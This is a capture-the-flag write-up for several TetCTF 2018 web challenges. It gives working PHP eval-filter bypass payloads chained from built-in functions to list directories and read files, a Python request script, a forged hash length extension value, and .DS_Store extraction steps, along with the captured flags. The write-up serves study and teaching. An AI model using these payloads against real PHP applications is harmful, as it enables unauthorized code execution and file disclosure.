CTF
Search…
TetCTF - 2018

Web - PHPlimit Revenge

filter.php
1
<?php
2
3
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
4
{
5
if(preg_match('/_|m|info|get/i',$_GET['code']))
6
{
7
die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
8
}
9
else
10
{
11
eval($_GET['code']);
12
}
13
}
14
else
15
{
16
show_source(__FILE__);
17
}
18
19
?>
Copied!
I am not familiar with PHP code, but with a mindset of RE-er,...then JUST FUCKING DO IT!
Btw, i joined after contest started for a while (9 AM 4/1/2018), so they already released the phplimit revenge 2, i just need to read which funcs are filtered by 2, and use it to create my payload
payload1
1
import requests
2
3
url = "http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(rand()))))));"
4
r = requests.get(url)
5
while len(r.content) == 0:
6
r = requests.get(url)
7
print r.content
8
9
#view-source:http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(ord(join(localeconv()))))))));
Copied!
payload2
1
#view-source:http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(ord(join(localeconv()))))))));
Copied!
flag
1
<?php
2
3
$fl0wer="TetCTF{_Limbo_Escaped!_Welcome_back_to_Real_Life_}";
4
5
?>
Copied!

Web - PHPlimit revenge 2

filter
1
<?php
2
3
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
4
{
5
if(preg_match('/_|m|info|get|strlen|rand|path/i',$_GET['code']))
6
{
7
die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
8
}
9
else
10
{
11
eval($_GET['code']);
12
}
13
}
14
else
15
{
16
show_source(__FILE__);
17
}
18
19
?>php
Copied!
In this challenge, you couldnt use rand() anymore, so to get ".", i use localeconv()
With scandir(), i can print all file in current directory
Checking content file well_play_but_flag_not_here.php
1
#view-source:http://45.76.181.81/?code=print(readfile(end(scandir(current(localeconv())))));
2
<?php
3
4
$fl0wer="Flag not here! go to directory's parent directory";
5
6
?>
Copied!
Checking parent folder ".." :
Found flag, now i chdir() to parent directory :
chdir() successed, now i need create '.' from 1. Here i use some math functions in php like sqrt(), exp(), sin(), cos(),...

I love calculatin! <3

I use e^1 = 2.7x
I use ord('2') = 50
I use sqrt(50) = 7.x
I use ceil(7.x) = 8
ord('8') = 56
octdec(56) = 46
chr(46) = '.' , so i got '.' huehuehuehue
1
exp(1) = e^1 = 2.xxxx
2
ord(2) = 50
3
sqrt(50) = 7.xx
4
ceil(7.x) = 8
5
ord('8') = 56
6
oct2dec(56) = 46
7
8
chr(46) = '.'
Copied!
From now on, it is similar to phplimit revenge 1, just read flag, final payload :
final-payload
1
view-source:http://45.76.181.81/?code=print(readfile(end(scandir(chr(octdec(ord(ceil(sqrt(ord(exp(chdir(next(scandir(current(localeconv())))))))))))))));
Copied!
flag
1
2
<?php
3
4
$flower="TetCTF{__Hey___PhP___Master___}";
5
6
?>
Copied!
1
Thanks @Ariana for teaching me thinking in multiple base/dimension
Copied!

Web - IQ Test 2

challenge.php
1
https://pastebin.com/7zdc5DNX
Copied!
This is a challenge about hash length extension, I used this tool below to calculate saved and hash for level13
1
https://github.com/iagox86/hash_extender
Copied!
payload
1
hash: 6ac223512cea8d11c0fdf14dccbfbe62
2
saved: c2VlZD10cnVlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAAAmbGV2ZWw9eGlpaQ==
Copied!
Now i have hash, have saved, so i created request with Burpsuite
Finally
1
TetCTF{__Happy_new_Y3aR__!!_H3re_Your_Flower_}
Copied!

Web - File

I already meet this kind of challenge before in Matesctf 2018 round 2
Tried dirsearch :
Extract file /.DS_Store with this tool
1
https://github.com/lijiejie/ds_store_exp
Copied!
Check h1ddenn
flag
1
TetCTF{__DS_Store__seems_sad__}
Copied!

Last words & Credits

My dream team! <3
Last modified 2yr ago